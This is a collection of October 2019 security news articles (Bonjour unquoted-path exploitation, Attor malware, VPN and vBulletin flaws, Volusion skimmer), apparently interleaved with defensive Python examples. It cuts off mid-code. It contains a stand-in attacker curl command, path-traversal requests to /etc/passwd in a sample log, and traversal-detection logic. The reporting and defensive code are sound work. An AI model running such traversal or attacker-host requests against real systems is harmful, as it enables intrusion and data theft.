“This time we have identified the abuse of an Apple zero-day vulnerability in the Bonjour updater that comes packaged with iTunes for Windows. The Windows exploit is important to note given Apple is sunsetting iTunes for Macs with the release of macOS Catalina this week, while Windows users will still need to rely on iTunes for the foreseeable future.” reads the security advisory published by Morphisec.
“The adversaries abused an unquoted path to maintain persistence and evade detection.”

The Bonjour updater runs in the background and automates multiple tasks, including automatically downloading updates for Apple software. Experts pointed out that the Bonjour updater has its own installation entry in the installed software section and a scheduled task to execute the process. This means that even uninstalling iTunes and iCloud doesn’t remove the Bonjour updater.

The experts discovered that the Bonjour updater was affected by an unquoted service path vulnerability.

Unquoted search paths are a relatively old class of vulnerability that occurs when the path to an executable service or program (commonly an uninstaller) is unquoted and contains spaces. The spaces allow someone to place their own executable earlier in the path and get it executed instead of the intended binary.

Bonjour was trying to run from the Program Files folder, but due to the unquoted path issue, it instead ran the BitPaymer ransomware that was named Program.

“Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe“. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine.” continues the analysis. “In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.”

Experts explained that attackers who use a legitimate process signed by a trusted vendor, like Bonjour, are able to execute a new malicious child process while evading detection. In this specific attack, security programs did not scan the malicious payloads because they had no file extension.

The unquoted service path vulnerability could also be exploited by attackers to escalate privileges.
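The following Python is an added example, not Morphisec’s or Apple’s code, that models how an unquoted command line containing spaces is split into candidate executables, audits a constructed set of service ImagePath values for the weakness, and shows the quoted form that removes the ambiguity. The service names and paths are constructed (the Bonjour path in particular is a placeholder, not the real binary’s location), and the relative order in which Windows tries a bare prefix versus the prefix with .exe appended is deliberately not modelled; both are listed because the article reports the bare “Program” file being executed while the CreateProcess documentation lists the .exe form.

```python
"""Added example (not Morphisec's or Apple's code): how an unquoted service
path with spaces is split into candidate executables, and an audit of
constructed ImagePath values with the quoted form that fixes them."""
import re
from typing import Dict, List

# Constructed sample, in the shape of
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath values.
SAMPLE_IMAGE_PATHS: Dict[str, str] = {
    "BonjourUpdater": r"C:\Program Files\Bonjour\updater.exe",          # constructed path
    "AgentTwo":       r"C:\Program Files\Vendor Two\agent.exe -svc",     # with arguments
    "GoodService":    r'"C:\Program Files\Good Vendor\svc.exe" -run',    # properly quoted
    "NoSpaces":       r"C:\Tools\agent.exe",
    "KernelDriver":   r"system32\DRIVERS\example.sys",
}


def executable_part(image_path: str) -> str:
    """Everything up to and including the first '.exe'; the rest is arguments."""
    m = re.match(r"(?i)(.*?\.exe)", image_path)
    return m.group(1) if m else image_path


def candidate_paths(exe_path: str) -> List[str]:
    """Files a loader may try for an unquoted path, shortest prefix first:
    each prefix that ends at a space is listed as written (the extension-less
    'Program' case from the article) and with '.exe' appended (the case the
    CreateProcess documentation lists); the full path comes last. The
    relative order of the two spellings is not modelled."""
    if exe_path.startswith('"'):
        return [exe_path.strip('"')]          # quoted: no ambiguity
    parts = exe_path.split(" ")
    cands: List[str] = []
    for i in range(1, len(parts)):
        prefix = " ".join(parts[:i])
        cands += [prefix, prefix + ".exe"]
    cands.append(exe_path)
    return cands


def unquoted_path_findings(image_paths: Dict[str, str]) -> Dict[str, List[str]]:
    """Service name -> planting spots, for every unquoted path with a space."""
    findings = {}
    for name, path in image_paths.items():
        if path.startswith('"'):
            continue
        exe = executable_part(path)
        if " " in exe:
            findings[name] = candidate_paths(exe)[:-1]   # drop the legitimate path
    return findings


def quote_image_path(path: str) -> str:
    """Hardened form: wrap the executable in quotes, keep its arguments."""
    if path.startswith('"'):
        return path
    exe = executable_part(path)
    return f'"{exe}"{path[len(exe):]}'


if __name__ == "__main__":
    for svc, spots in unquoted_path_findings(SAMPLE_IMAGE_PATHS).items():
        print(f"{svc}: unquoted path; a file at any of {spots} would run as the service")
        print(f"  fix: {quote_image_path(SAMPLE_IMAGE_PATHS[svc])}")
```

The audit output is the list of locations a defender needs to watch or lock down (on a default install a standard user cannot create C:\Program, which is why the attackers in this case already had a foothold), and re-running the audit over the quoted paths returns nothing, which is the check to apply after fixing the registry entries.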

Morphisec Labs reported their discovery to Apple, which released iCloud for Windows 10.7, iCloud for Windows 7.14, and iTunes 12.10.1 for Windows to address the vulnerability.

Users who have installed Apple software on their Windows computer and then uninstalled it should manually uninstall the Bonjour updater if it is still present.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware appeared first on Security Affairs.

Attor malware was developed by one of the most sophisticated espionage groups

New espionage malware found targeting Russian-speaking users in Eastern Europe

ESET found an advanced piece of malware named Attor targeting diplomats and high-profile Russian-speaking users in Eastern Europe.

ESET researchers discovered an advanced piece of malware named Attor that was used in cyberespionage operations against diplomats and high-profile Russian-speaking users in Eastern Europe.

Threat actors have been using Attor since 2013, yet the malicious code remained under the radar until last year.

The researchers believe that the threat actor behind Attor is a state-sponsored group involved in highly targeted attacks on selected targets.

“Attor’s espionage operation is highly targeted – we were able to trace Attor’s operation back to at least 2013, yet, we only identified a few dozen victims.” reads the analysis published by ESET.

“For example, in order to be able to report on the victim’s activities, Attor monitors active processes to take screenshots of selected applications. Only certain applications are targeted – those with specific substrings in the process name or window title.”

The researchers believe that the malware was specifically developed to infect mainly Russian-speaking users: it targets popular Russian apps and services, including the social networks Odnoklassniki and VKontakte, the VoIP provider Multifon, the IM apps Qip and Infium, the search engine Rambler, the email clients Yandex and Mail.ru, and the payment system WebMoney.

The malware implements a modular structure with a dispatcher and loadable plugins, all of which are implemented as dynamic-link libraries (DLLs). The attackers first compromise the target and drop the components on disk, then load the dispatcher DLL.

The Attor malware makes sophisticated use of encryption to hide its components.

The plugins are delivered as DLLs asymmetrically encrypted with RSA and are only ever recovered in memory, using the public RSA key embedded in the dispatcher.

“In total, the infrastructure for C&C communication spans four Attor components – the dispatcher providing encryption functions, and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication.” continues the analysis. “This mechanism makes it impossible to analyze Attor’s network communication unless all pieces of the puzzle have been collected.”

“We were able to recover eight of Attor’s plugins, some in multiple versions – we list them in Table 2. Assuming the numbering of plugins is continuous, and that actors behind Attor may use different sets of plugins on a per‑victim basis, we suspect there are even more plugins that have not yet been discovered.” continues the analysis.

The analysis of the malware samples revealed an interesting module designed to detect when users connect modems and older phones to their devices. The malware can collect information about the files present on the connected devices.

“The most curious plugin in Attor’s arsenal collects information about both connected modem/phone devices and connected storage drives, and about files present on these drives. It is responsible for collection of metadata, not the files themselves, so we consider it a plugin used for device fingerprinting, and hence likely used as a base for further data theft.” reads the report.

“While Attor’s functionality of fingerprinting storage drives is rather standard, its fingerprinting of GSM devices is unique.”

Attor’s device monitoring module implements a unique fingerprinting feature of GSM devices. Whenever a modem or a phone device is connected to a COM port, Device monitor uses AT commands to communicate with it.
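To make the GSM fingerprinting concrete, here is an added example (not ESET’s code and not Attor’s) that parses a serial-port transcript of standard AT identification commands into the kind of device record such a plugin would assemble. The transcript, vendor strings and identifiers are constructed for illustration, and the command set is assumed from the 3GPP AT command standard rather than taken from the report; the point is what an analyst should expect to find in such a record.

```python
"""Parse a captured AT command exchange into a device fingerprint.

Added example, not ESET's or Attor's code. It models the metadata a
serial-port fingerprinting plugin can obtain from a GSM modem through
standard 3GPP identification commands. The transcript, the vendor
strings and the identifiers below are constructed placeholders.
"""
import re

# Constructed transcript: lines the host sent (">") and the modem's
# replies ("<"), in the form an analyst might reconstruct from a serial
# port monitor.
TRANSCRIPT = """\
> AT
< OK
> AT+CGMI
< Example Modem Vendor
< OK
> AT+CGMM
< EXAMPLE-MODEL-1
< OK
> AT+CGSN
< 000000000000000
< OK
> AT+CIMI
< ERROR
> AT+CGMR
< +CGMR: 01.02.03
< OK
"""

# Standard identification commands and the fingerprint field each fills.
# Which commands a real plugin issues is an assumption here.
FIELDS = {
    "AT+CGMI": "manufacturer",
    "AT+CGMM": "model",
    "AT+CGMR": "revision",
    "AT+CGSN": "imei",
    "AT+CIMI": "imsi",
}


def _strip_prefix(command, lines):
    """Join response lines, dropping an optional '+CMD: ' echo prefix."""
    name = command.split("+", 1)[1]          # 'CGMR' from 'AT+CGMR'
    prefix = re.compile(r"^\+" + re.escape(name) + r":\s*")
    return " ".join(prefix.sub("", ln) for ln in lines)


def parse_at_transcript(text):
    """Return {field: value} for every identification command that succeeded.

    A response is everything between the command and the final result code
    ('OK' or 'ERROR'). Commands answered with ERROR, e.g. AT+CIMI with no
    SIM inserted, are listed under 'errors' instead of yielding a value.
    """
    fingerprint = {"errors": []}
    current, body = None, []
    for raw in text.splitlines():
        direction, _, payload = raw.partition(" ")
        payload = payload.strip()
        if direction == ">":
            current, body = payload.upper(), []
        elif direction == "<":
            if payload not in ("OK", "ERROR"):
                body.append(payload)
                continue
            field = FIELDS.get(current)
            if field is not None:
                if payload == "ERROR":
                    fingerprint["errors"].append(field)
                else:
                    fingerprint[field] = _strip_prefix(current, body)
            current, body = None, []
    return fingerprint


if __name__ == "__main__":
    for key, value in parse_at_transcript(TRANSCRIPT).items():
        print(f"{key:>12}: {value}")
```

The ERROR branch matters for forensics: a record with an IMEI but no IMSI is consistent with a modem or handset that had no SIM inserted at the time of connection, which is exactly the kind of inference the metadata-only design of the plugin allows.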

ESET believes that the authors of the Attor malware developed this module to target users owning older mobile handsets, or even a custom GSM-capable platform.

“A more likely explanation of the plugin’s main motive is that it targets modems and older phones. Alternatively, it may be used to communicate with some specific devices (used by the victim or target organization) that are connected to the COM port or to the USB port using a USB-to-serial adaptor.” concludes the analysis. “In this scenario, it is possible the attackers have learned about the victim’s use of these devices using some other reconnaissance techniques.”

Pierluigi Paganini

(SecurityAffairs – Attor, malware)

The post Attor malware was developed by one of the most sophisticated espionage groups appeared first on Security Affairs.

SAP October 2019 Security Patch Day fixes 2 critical flaws

SAP addressed two critical vulnerabilities (Hot News) as part of the October 2019 Security Patch Day.

SAP has released its October 2019 Security Patch Day updates that also address two critical vulnerabilities (Hot News) with CVSS scores of 9.3 and 9.1.

The October 2019 Security Patch Day also includes a High Priority Note addressing a Binary Planting vulnerability.

“With only nine new and one updated Security Note, SAP has published an unusually low number of Security Notes for October 2019.” reads the analysis published by security firm Onapsis. “This is the lowest number of newly published notes in the past five years. Nevertheless, with 2 HotNews Notes and one High Priority Note, this Patch Day deserves special attention as an attacker needs only one vulnerability for a successful attack.”

The most severe SAP Security Note is #2826015, a Missing Authentication Check in the AS2 Adapter of the B2B Add-On for SAP NetWeaver Process Integration. The vulnerability, tracked as CVE-2019-0379, could be exploited by remote attackers to steal or manipulate sensitive data, and it could also give attackers access to administrative and other privileged functionality.

“The adapter specifies a comprehensive set of data security features, specifically data confidentiality and data authenticity, which are aimed at the B2B commerce environment. The configuration of the AS2 adapter allows two different security providers.” reads the analysis published by Onapsis. “Depending on the selected provider, a Missing Authentication vulnerability exists that can lead to sensitive data theft or data manipulation as well as to access to administrative and other privileged functionalities.”

The vulnerability received a CVSS score of 9.3.

The second Hot News (SAP Security Note #2828682) addresses a flaw tracked as CVE-2019-0380, an information disclosure issue in SAP Landscape Management enterprise edition. The flaw affects version 3.0 and received a CVSS score of 9.1.

“SAP Security Note #2828682 talks about a risk of information disclosure if these custom parameters fulfill specific conditions. SAP describes the overall conditions for the existence of the vulnerability as ‘uncommon’.”

The vulnerability is related to the custom parameters that can be added by users to providers assigned to custom operations.


SAP also addressed a Binary Planting vulnerability in several SAP software products, including Anywhere, SAP IQ and SAP Dynamic Tiering. The flaw, tracked as CVE-2019-0381, resides in the file search algorithm of the affected products and received a CVSS score of 7.8.

“The algorithm searches too many directories, even if they are out of the application scope.” Onapsis explains. “Possible impacts are path traversals and directory climbing, enabling an attacker to read, overwrite, delete, and expose arbitrary files of the system. This can also lead to DLL hijacking as well as to privilege elevation.”

SAP also addressed multiple Cross-Site Scripting (XSS) vulnerabilities in its products, rated as medium, including one in Customer Relationship Management (CVE-2019-0368) and multiple issues in the SAP BusinessObjects Business Intelligence Platform (CVE-2019-0374, CVE-2019-0375, CVE-2019-0376, CVE-2019-0377, and CVE-2019-0378).

The full list of the addressed issues in SAP Security Patch Day – October 2019 is available here.

Tor Project is going to remove End-Of-Life relays from the network

Maintainers at the Tor Project have removed from the network more than 800 relay servers running outdated and EOL versions of the Tor software.

Currently, the Tor network is composed of more than 6000 relays, some of them running outdated Tor software versions (in some cases back to the 0.2.4.x versions). Other relays are running the latest Tor software in nightly builds and alpha releases. Maintainers of the Tor Project announced they have removed relay servers running outdated and EOL versions of the Tor software.

Tor Project experts pointed out that they currently maintain only 5 Tor version series, 0.2.9.x (LTS), 0.3.5.x (LTS), 0.4.0.x, 0.4.1.x, 0.4.2.x (Stable on Dec 15th, 2019).

Now the maintainers of the project have announced that they removed roughly 13.5% of the relay servers: 750 acting as Tor middle relays and 62 as exit relays.

The presence of End-Of-Life relays in the Tor network has multiple negative impacts on network stability and security; it also complicates maintenance, because important fixes and new features cannot easily be rolled out to them.

“In the past weeks, we’ve taken steps to contact every relay operator with a valid ContactInfo field to ask them to upgrade to the latest stable release. The Tor relay community was informed via the tor-relays mailing list on September 3rd 2019 of this upcoming change.” reads the announcement published by the Tor Project.

“The End-Of-Life relays in the network currently make up just over 12% of the total bandwidth, or around 750 relays. Out of these, only 62 are Exit relays accounting for only 1.68% of the total Exit traffic. We expect a minor impact on the size of the network, and a small drop in the Metrics graph.”

The maintainers expect a new Tor stable release in November, it will reject End-Of-Life relays by default. Until then, the maintainers will reject obsolete relays using their fingerprints.
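As an added example, not the Tor Project’s own tooling, the following Python classifies relays by whether their advertised version belongs to one of the five maintained series listed above, which is the decision a directory authority has to make when it rejects End-Of-Life relays. The fingerprints and versions in the sample are constructed.

```python
"""Decide whether a Tor relay's advertised version is End-Of-Life.

Added example, not the Tor Project's own code. It assumes the five
series named in the announcement are the only supported ones and treats
every other series as EOL. Version strings follow Tor's
'MAJOR.MINOR.MICRO.PATCHLEVEL[-tag]' format.
"""
import re

# Supported series as listed in the Tor Project announcement (October 2019).
SUPPORTED_SERIES = {"0.2.9", "0.3.5", "0.4.0", "0.4.1", "0.4.2"}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)\.(\d+)(?:-([\w-]+))?$")


def parse_version(version):
    """Return (series, patchlevel, tag); raise ValueError on garbage input."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unparseable Tor version: {version!r}")
    major, minor, micro, patch, tag = m.groups()
    return f"{major}.{minor}.{micro}", int(patch), tag or ""


def is_eol(version, supported=SUPPORTED_SERIES):
    """A relay is EOL when its series is not one that is still maintained."""
    series, _, _ = parse_version(version)
    return series not in supported


def partition_relays(relays, supported=SUPPORTED_SERIES):
    """Split (fingerprint, version) pairs into keep / reject / unknown.

    Relays whose version cannot be parsed are reported separately so an
    operator can look at them by hand instead of silently dropping them.
    """
    keep, reject, unknown = [], [], []
    for fingerprint, version in relays:
        try:
            eol = is_eol(version, supported)
        except ValueError:
            unknown.append(fingerprint)
            continue
        (reject if eol else keep).append(fingerprint)
    return keep, reject, unknown


# Constructed sample: the fingerprints are placeholders, not real relays.
SAMPLE_RELAYS = [
    ("FP-A", "0.4.1.6"),
    ("FP-B", "0.2.4.27"),       # the ancient series mentioned in the article
    ("FP-C", "0.3.5.8"),
    ("FP-D", "0.4.2.1-alpha"),  # alpha of a supported series: kept
    ("FP-E", "0.3.4.11"),       # series that is no longer maintained
    ("FP-F", "garbage"),
]

if __name__ == "__main__":
    keep, reject, unknown = partition_relays(SAMPLE_RELAYS)
    print("keep:", keep)
    print("reject (EOL):", reject)
    print("unknown:", unknown)
```

Note that the check is on the series, not on the patch level: an old patch release of a maintained series is outdated but not End-Of-Life, which matches the distinction the announcement draws.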

Instructions for upgrading End-Of-Life relays are included in the announcement.

Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware

NSO Group’s surveillance spyware made the headlines again: according to Amnesty International, the malware was used to spy on two rights activists in Morocco.

Amnesty International collected evidence of new abuses of NSO Group’s surveillance spyware; this time the malware was used to spy on two rights activists in Morocco.

Experts at Amnesty International analyzed the devices of Abdessadak El Bouchattaoui for evidence of targeting and confirmed that he was targeted repeatedly with malicious SMS messages carrying links to websites connected to NSO Group’s Pegasus spyware.

“After checking his devices for evidence of targeting, Amnesty International was able to confirm that Abdessadak El Bouchattaoui was indeed targeted repeatedly with malicious SMS messages that carried links to websites connected to NSO Group’s Pegasus spyware.” reads the analysis published by Amnesty International.

The organization also discovered that the spyware was used to spy on Maati Monjib; the rights group believes the operation is part of state-sponsored repression of human rights defenders.

Bouchattaoui is a lawyer and HRD; in February 2017, a court in Al Hoceima sentenced him to 20 months in prison and a fine for online posts in which he criticized the use of excessive force by the authorities during the Hirak El-Rif social justice protests of 2016 and 2017. Monjib is a historian and columnist, and co-founder of the NGO Freedom, which in 2015 was accused of threatening the internal security of the state “through propaganda.”


The victims were targeted with messages related to the Hirak El-Rif movement and the subsequent repression by the Moroccan security forces. The messages included links that, once clicked by the victims, would start the attack chain allowing the attacker to remotely control the device.

The links used in these attacks are similar to the ones Amnesty International detected in June 2018 in operations against an Amnesty staff member and a Saudi HRD.

“SMS messages sent to Moroccan Human Rights Defenders, as documented in this report, also carry similar links to the same set of Internet infrastructure attributed to NSO Group.” states the report.

“NSO Group is known to only sell its spyware to government intelligence and law enforcement agencies, raising serious concerns that Moroccan security agencies are behind the surveillance.”

NSO Group refuses any accusation and claims that its surveillance technology is only used for lawful purposes. 

In May, Amnesty International filed a lawsuit against Israeli surveillance firm NSO, the lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

Oops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012

Security experts discovered a critical remote code execution vulnerability, tracked as CVE-2019-9535, in the GPL-licensed iTerm2 macOS terminal emulator app.

Security experts at cybersecurity firm Radically Open Security (ROS) discovered a 7-year-old critical remote code execution vulnerability in the GPL-licensed iTerm2 macOS terminal emulator app.

The iTerm2 macOS terminal emulator app is one of the most popular open-source replacements for Mac’s built-in terminal app.

The RCE flaw tracked as CVE-2019-9535 was discovered as part of an independent security audit funded by the Mozilla Open Source Support Program (MOSS).

“A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2.” reads the security advisory published by Mozilla. “During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.”

The RCE vulnerability resides in the tmux integration feature of iTerm2, it could be exploited by an attacker to execute arbitrary commands by providing malicious output to the terminal.

The experts published a video PoC that shows how to exploit the vulnerability by producing output to the terminal. Possible attack vectors would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log.

“Typically, this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe, there is a high degree of concern about the potential impact,” Mozilla concludes.

iTerm2 version 3.3.6 addresses the flaw, which affects prior versions.

Multiple APT groups are exploiting VPN vulnerabilities, NSA warns

NSA is warning of multiple state-sponsored cyberespionage groups exploiting enterprise VPN Flaws

Last week, the UK’s National Cyber Security Centre (NCSC) reported that advanced persistent threat (APT) groups have been exploiting recently disclosed VPN vulnerabilities in enterprise VPN products in attacks in the wild. Threat actors leverage VPN vulnerabilities in Fortinet, Palo Alto Networks and Pulse Secure, to breach into the target networks.

The UK agency reported that APT groups target several vulnerabilities, including CVE-2019-11510 and CVE-2019-11539 in Pulse Secure VPN solutions, and CVE-2018-13379 in Fortinet FortiOS.

CVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that could be exploited by an unauthenticated attacker to download FortiOS system files. The flaw could be exploited to obtain administrator credentials in plain text.

The CVE-2019-11510 flaw in Pulse Connect Secure is a critical arbitrary file read vulnerability.
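Both flaws belong to the same family of unauthenticated file read through a web portal, so one thing a defender can do while patching is look back through portal or reverse-proxy logs for traversal attempts. The check below is an added defensive example that is not part of the NCSC or NSA advisories: it scans access-log lines for `..` segments in the request path, including percent- and double-encoded forms. The log lines, addresses and paths are constructed and do not reproduce any real exploit request.

```python
"""Flag path-traversal attempts in web-server access logs.

Added example, not from the NCSC/NSA advisories. It decodes percent-
encoding repeatedly (so double encoding does not hide the payload) and
looks for '..' path segments. The log lines below are constructed.
"""
import re
from urllib.parse import unquote, urlsplit

# Common Log Format style: ip - - [timestamp] "METHOD path PROTO" status size
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def decode_path(raw):
    """Percent-decode until the string stops changing (max 3 rounds)."""
    prev, cur = None, raw
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    # Treat backslashes as separators too; some servers accept them.
    return cur.replace("\\", "/")


def has_traversal(path):
    """True when any decoded path segment is exactly '..'."""
    decoded = decode_path(urlsplit(path).path)
    return any(seg == ".." for seg in decoded.split("/"))


def find_traversal_attempts(lines):
    """Return one record per log line whose request path traverses upward."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        ip, method, path, status = m.groups()
        if has_traversal(path):
            hits.append({"ip": ip, "method": method, "path": path,
                         "status": int(status)})
    return hits


# Constructed sample log (RFC 5737 documentation addresses, made-up paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Oct/2019:10:00:01 +0000] "GET /portal/login HTTP/1.1" 200 1532',
    '203.0.113.9 - - [08/Oct/2019:10:00:02 +0000] "GET /portal/static/../../../../etc/passwd HTTP/1.1" 200 812',
    '203.0.113.9 - - [08/Oct/2019:10:00:03 +0000] "GET /portal/static/%2e%2e/%2e%2e/config HTTP/1.1" 404 0',
    '203.0.113.9 - - [08/Oct/2019:10:00:04 +0000] "GET /portal/static/%252e%252e/secret HTTP/1.1" 403 0',
    '198.51.100.7 - - [08/Oct/2019:10:00:05 +0000] "GET /portal/help/..images/x.png HTTP/1.1" 200 44',
]

if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 response to a traversal request is the line worth escalating: it is the signature of a read that succeeded, and per the NSA advice any credentials reachable that way should be treated as exposed and rotated after the upgrade.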

APT groups also exploit CVE-2018-13382, CVE-2018-13383, and CVE-2019-1579, in Palo Alto Networks products.

The vulnerabilities were first reported in July by researchers Orange Tsai and Meh Chang from DEVCORE that found several flaws in Fortinet, Palo Alto Networks and Pulse Secure products. The issues could be exploited by threat actors to access corporate networks and steal sensitive documents

Microsoft researchers recently reported that the APT5 cyberespionage group (aka MANGANESE) has been exploiting VPN vulnerabilities since July, some weeks before PoC exploits were publicly disclosed.

Now the NSA is warning of multiple state-sponsored cyberespionage groups exploiting enterprise VPN flaws.

“Multiple Nation State Advanced Persistent Threat (APT) actors have weaponized CVE-2019-11510, CVE-2019-11539, and CVE-2018-13379 to gain access to vulnerable VPN devices.” reads the security advisory published by the NSA.

“If a malicious actor previously exploited the vulnerability to collect legitimate credentials, these credentials would still be valid after patching. NSA recommends resetting credentials after a vulnerable VPN device is upgraded and before it is reconnected to the external network:

  • Immediately update VPN user, administrator, and service account credentials.
  • Immediately revoke and generate new VPN server keys and certificates. This may require redistributing VPN connection information to users.
  • If compromise is suspected, review accounts to ensure no new accounts were created by adversaries.”

Both the NCSC and the NSA confirmed that APT groups targeted several sectors, including military, government, academic, business and healthcare. The security advisories published by the agencies did not name any of the APTs leveraging the above VPN vulnerabilities.

In August, BadPackets experts observed a mass scanning activity targeting Pulse Secure “Pulse Connect Secure” VPN endpoints vulnerable to CVE-2019-11510. At the time, over 14,000 vulnerable Pulse Secure endpoints were hosted by more than 2,500 organizations. The number of vulnerable endpoints dropped to roughly 6,000 by October 8, most of them in the United States, Japan and the UK.

vBulletin addresses three new high-severity vulnerabilities

vBulletin has recently published a new security patch update that addresses three high-severity vulnerabilities in the popular forum software.

vBulletin has recently published a new security patch update that addresses three high-severity flaws in vBulletin 5.5.4 and prior versions.

The vulnerabilities could be exploited by remote attackers to take complete control over targeted web servers and steal sensitive user information.

The first vulnerability, tracked as CVE-2019-17132, is a remote code execution flaw reported by security researcher Egidio Romano.

The vulnerability resides in the way the vBulletin forum handles user requests to update profile avatars; a remote attacker could exploit it to inject and execute arbitrary PHP code on the target server through unsanitized parameters. The vulnerability cannot be triggered in a default installation of the vBulletin forum.

“User input passed through the “data[extension]” and “data[filedata]” parameters to the “ajax/api/user/updateAvatar” endpoint is not properly validated before being used to update users’ avatars. This can be exploited to inject and execute arbitrary PHP code.” reads the security advisory. “Successful exploitation of this vulnerability requires the “Save Avatars as Files” option to be enabled (disabled by default).”

Proof-of-concept code is available at the following URL:

http://karmainsecurity.com/pocs/CVE-2019-17132

The other two vulnerabilities addressed by vBulletin are SQL injection issues, both tracked as CVE-2019-17271.

“1) User input passed through keys of the “where” parameter to the “ajax/api/hook/getHookList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through in-band SQL injection attacks. Successful exploitation of this vulnerability requires an user account with the “canadminproducts” or “canadminstyles” permission.” reads the security advisory.

“2) User input passed through keys of the “where” parameter to the “ajax/api/widget/getWidgetList” endpoint is not properly validated before being used in an SQL query. This can be exploited to e.g. read sensitive data from the database through time-based SQL injection attacks. Successful exploitation of this vulnerability requires an user account with the “canusesitebuilder” permission.”

The two vulnerabilities could allow administrators with restricted privileges to read sensitive data from the database.
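The bug class behind both SQL injection issues, where the keys of a request parameter end up as column names in the query, is easy to reproduce and easy to miss, because parameterising the values alone does nothing for the keys. The Python below is an added example, not vBulletin’s code: it shows the unsafe builder next to a hardened one that accepts only allowlisted column names and binds values as parameters. The table, columns and rows are constructed.

```python
"""Building a WHERE clause from a user-supplied {column: value} mapping.

Added example, not vBulletin's code. The unsafe builder splices the
dictionary keys straight into SQL text; the hardened one rejects any
key that is not a known column and binds the values. Table, column
names and rows are constructed for the demonstration.
"""
import sqlite3

ALLOWED_COLUMNS = {"hookname", "product", "active"}


def build_where_unsafe(where):
    """Vulnerable pattern: keys become SQL text, only values are bound."""
    clauses = [f"{column} = ?" for column in where]
    return " AND ".join(clauses), list(where.values())


def build_where_safe(where, allowed=ALLOWED_COLUMNS):
    """Hardened: refuse unknown keys, quote the rest as identifiers."""
    bad = [column for column in where if column not in allowed]
    if bad:
        raise ValueError(f"unknown column(s) in where: {bad}")
    clauses = [f'"{column}" = ?' for column in where]
    return " AND ".join(clauses), list(where.values())


def rejects(where):
    """True when the safe builder refuses this mapping."""
    try:
        build_where_safe(where)
    except ValueError:
        return True
    return False


def query_hooks(conn, where, builder=build_where_safe):
    """Run the filtered query; the builder decides how keys are handled."""
    sql_where, params = builder(where)
    sql = f"SELECT hookname, product FROM hook WHERE {sql_where}"
    return conn.execute(sql, params).fetchall()


def make_db():
    """In-memory table standing in for a hook list (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE hook (hookname TEXT, product TEXT, active INTEGER);
        INSERT INTO hook VALUES ('footer', 'core', 1), ('beta', 'plugin', 0);
    """)
    return conn


if __name__ == "__main__":
    conn = make_db()
    print("safe:", query_hooks(conn, {"product": "core"}))
    # With the unsafe builder the key text lands in the statement verbatim:
    print("unsafe SQL text:", build_where_unsafe({"not_a_column": 1})[0])
    # The safe builder refuses anything outside the allowlist instead:
    print("rejected:", rejects({"not_a_column": 1}))
```

The allowlist is the essential part: quoting identifiers or escaping them is not a substitute, because the set of legitimate filter columns for an endpoint is known in advance and anything else should fail closed, which also removes the time-based variant described in the second advisory item.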

Romano reported all the flaws to the vBulletin maintainers on September 30, and the maintainers released the security patch updates in response.

Last month, vBulletin released a patch for a critical zero-day remote code execution vulnerability.

Hackers compromised Volusion infrastructure to siphon card details from thousands of sites

Hackers have compromised the infrastructure of Volusion and are distributing malicious software skimmers to steal payment card data provided by users.

Volusion is a privately-held technology company that provides ecommerce software and marketing and web design services for small and medium sized businesses. The company has over 250 employees and has served more than 180,000 customers since its founding in 1999.

Hackers have compromised the infrastructure of Volusion and are distributing malicious software skimmers to steal payment card data provided by users. Experts report more than 6,500 stores have been hacked, but they believe that tens of thousands of e-commerce platforms may have been compromised.

The discovery was made by Check Point security researcher Marcel Afrahim that shared his findings in a blog post on Medium.

The experts initially noticed that the Sesame Street Live online store was compromised; it is built with Volusion’s All-in-One E-commerce Website Builder and its name servers are maintained by Volusion.

While analyzing the checkout page, the expert noticed that all the resources were loading from sesamestreetlivestore.com or Volusion-affiliated websites, except for an odd JavaScript file loaded from storage.googleapis.com, from a bucket named volusionapi.

This suggests that hackers gained access to Volusion’s Google Cloud infrastructure and were able to inject into a JavaScript file the malicious code that siphons payment card details.


The compromised script was located at https://storage.googleapis.com/volusionapi/resources.js and is loaded on Volusion-based online stores via the /a/j/vnav.js file.
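The observation that exposed the skimmer, namely listing every host a checkout page loads JavaScript from and flagging the ones the merchant does not expect, can be automated and run against a store’s own pages. The following is an added example, not the researcher’s code, applied to a constructed checkout page: the bucket URL is the one named in the article, the other script paths are made up, and the allowlist is an assumption about what the store owner would approve.

```python
"""List the hosts a checkout page loads scripts from and flag strangers.

Added example, not from the researcher's post. The HTML is constructed;
only the storage.googleapis.com URL is the one named in the article.
The allowlist (the page's own host plus Volusion's domain) is an
assumption about what the merchant expects.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag that has one."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
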